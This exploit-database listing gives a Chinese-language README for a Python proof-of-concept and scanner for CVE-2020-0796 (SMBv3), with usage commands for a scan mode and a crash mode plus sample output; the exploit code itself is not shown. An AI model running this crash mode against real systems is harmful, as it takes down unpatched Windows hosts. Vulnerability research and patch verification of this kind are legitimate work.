Sploitus

Exploit for CVE-2020-0796

kitploit · 2026-08-25

Exploit Code

MARKDOWN33 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RAN-SAMA-CVE-2020-0796
# CVE-2020-0796

一个更简单的CVE-2020-0796 PoC和扫描器,因为它使用静态数据包。具有防止在公网IP上意外使用(不要那样做)的保护措施,以及一个用于触发崩溃的开关。仅需要原始Python 3!

扫描模式:

root@kitploit:~
    
    
    python3 poc-and-scan.py 10.0.0.15 N
    

扫描+崩溃模式:

root@kitploit:~
    
    
    python3 poc-and-scan.py 10.0.0.15 Y
    

输出:

root@kitploit:~
    
    
    SMB v311 with LZNT1 detected.
    Sending malformed packet per user request!
    

## 许可证

根据WTFPL许可证授权。